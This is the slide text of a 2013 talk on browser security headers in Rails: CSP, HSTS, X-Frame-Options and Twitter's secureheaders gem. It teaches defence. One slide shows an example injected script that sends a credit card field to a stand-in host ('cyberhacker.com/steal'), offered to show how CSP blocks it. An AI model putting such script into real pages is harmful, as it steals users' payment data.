@ocrails | @ndm

@ocrailsJanuary 30, 2013

Not your typical Rails security talkHeader use @ Twitter

B

@ocrails | @ndm

What are headers?

@ocrails | @ndm

Wait, not those ones

@ocrails | @ndm

OK, but what are browser headersAuthorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==

Accept: text/plain

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0

@ocrails | @ndm

Response headersCache-Control: max-age=3600

ETag: "737060cd8c284d8af7ad3082f209582d"

Location: http://www.w3.org/pub/WWW/People.html

@ocrails | @ndm

I’m already boredTime to get awesomer

@ocrails | @ndm

Security headersLeverage the browser for security

@ocrails | @ndm

Sweeeeet. I don’t have write secure code!

@ocrails | @ndm

Time of convergence

@ocrails | @ndm

Should you?

@ocrails | @ndm

Do you use these?Content security policy

X-Frame-Options

HTTP Strict Transport Security

X-Xss-Protection

X-Content-Type-Options

@ocrails | @ndm

X-ContentType-OptionsFixes mime sniffing attacks

Only applies to IE, because only IE would do something like this

X-Content-Type-Options = ‘nosniff’

zzzzZZZZZZzzzzz

@ocrails | @ndm

X-Xss-ProtectionUse the browser’s built in XSS Auditor

X-Xss-Protection: [0-1](; mode=block)?

X-Xss-Protection: 1; mode=block

(SCREENSHOT OF BLOCKED SCRIPT)

zzzzZZZ... huh? zzzzzzzz

@ocrails | @ndm

X-Frame-OptionsProtects you from most classes of Clickjacking

X-Frame-Options: DENY

X-Frame-Options: SAMEORIGIN

X-Frame-Options: ALLOW FROM example.com

zzz... oh hey thats cool. Don’t frame my stuff.

@owaspoc Jan 2013@ndm | @presidentbeef

X-Frame-Options

@ocrails | @ndm

Firesheep/SSL StripGiven I don’t haven’t received an HSTS header

And I have a session

When I visit http://example.com

Then I am pwned

@ocrails | @ndm

Other ssl failsPosting passwords over HTTP

Loading mixed content

Using protocol relative URLS

@ocrails | @ndm

Strict Transport Security

@ocrails | @ndm

How hard is it to use?Base CaseStrict-transport-security: max-age=10000000

Do all of your subdomains support SSL?Strict-transport-security: max-age=10000000; includeSubdomains

(SSL FOR DUMMIES PICTURE)

@ocrails | @ndm

Content secur-a-wat?Content security policy is reshaping the security modelIt is a complicated spec with great differences across browsers

It is not widely adopted

However, It completely eliminates reflected and stored XSSIt ensures that you never load mixed content

It can protect users with infected browsers

It allows you to accept arbitrary html code from users

@ocrails | @ndm

Wat? Sounds cool. x-webkit-csp:

script-src

style-src

img-src

default-src

frame-src

connect-src

font-src

media-src

object-src

report-uri

@owaspoc Jan 2013@ndm | @presidentbeef

QuickTime™ and aH.264 decompressor

are needed to see this picture.

@ocrails | @ndm

Get rid of XSS, eh?A script-src directive that doesn’t contain ‘unsafe-inline’ almost eliminates most forms of cross site scripting.

I WILL NOT WRITE INLINE JAVASCRIPT

I WILL NOT WRITE INLINE JAVASCRIPT

I WILL NOT WRITE INLINE JAVASCRIPT

I WILL NOT WRITE INLINE JAVASCRIPT

I WILL NOT WRITE INLINE JAVASCRIPT

I WILL NOT WRITE INLINE JAVASCRIPT

I WILL NOT WRITE INLINE JAVASCRIPT

@owaspoc Jan 2013@ndm | @presidentbeef

@owaspoc Jan 2013@ndm | @presidentbeef

But I have to...OK, then I’ll inject:<script>

var image = new Image();

image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();

</script>

FALSE! img-src violation, no XHR allowed

@ocrails | @ndm

Inline css too? WTF?

@ocrails | @ndm

Choose your own adventure

@ocrails | @ndm

Apply all the headers!

@ocrails | @ndm

How to apply?Secure headers!

Open sourced earlier this month

https://github.com/twitter/secureheaders

@ocrails | @ndm

How does it work?It sets a before_filter that applies each header

Values are based on options passed to filter, or in an initializer

Easily overridden

Secure by default!!!

@ocrails | @ndm

What about that security policy thingy

There are > 6 differences between these two header values

@ocrails | @ndm

Yay for standards

@ocrails | @ndm

Long hair don’t careAbout browser inconsistencies

@ocrails | @ndm

Other featuresSet separate policies for http/https

Autofill chrome-extension: (becoming part of spec)

Auto fill missing directives with default value (becoming part of the spec)

@ocrails | @ndm

You mean there’s more on CSP?The browser sends reports!

@ocrails | @ndm

What does the report look like?{

"csp-report"=> {

"document-uri"=>"http://localhost:3000/home",

"referrer"=>"",

"blocked-uri"=>"ws://localhost:35729/livereload",

"violated-directive"=>"xhr-src ws://localhost.twitter.com:*"

}

}

@ocrails | @ndm

Quiz: what does this report indicate?{

"csp-report"=> {

"document-uri"=>"http://example.com/welcome",

"referrer"=>"",

"blocked-uri"=>"self",

"violated-directive"=>"inline script base restriction",

"source-file"=>"http://example.com/welcome",

"script-sample"=>"alert(1)",

"line-number"=>81

}

}

@ocrails | @ndm

Header gem to the rescueIt forwards CSP reports for Firefox

It makes setting an enforce and report only mode easy for experimentation

@ocrails | @ndm

Monitor and Tune ALL the things

@ocrails | @ndm

Splunk

@ocrails | @ndm

Trending and anomalies

@owaspoc Jan 2013@ndm | @presidentbeef

CSP

Brakeman

ThreatDeckPhantom Gang

Roshambo

Emaildevelopers

Emailsecurity

@ocrails | @ndm

Who wants to buy me a beer?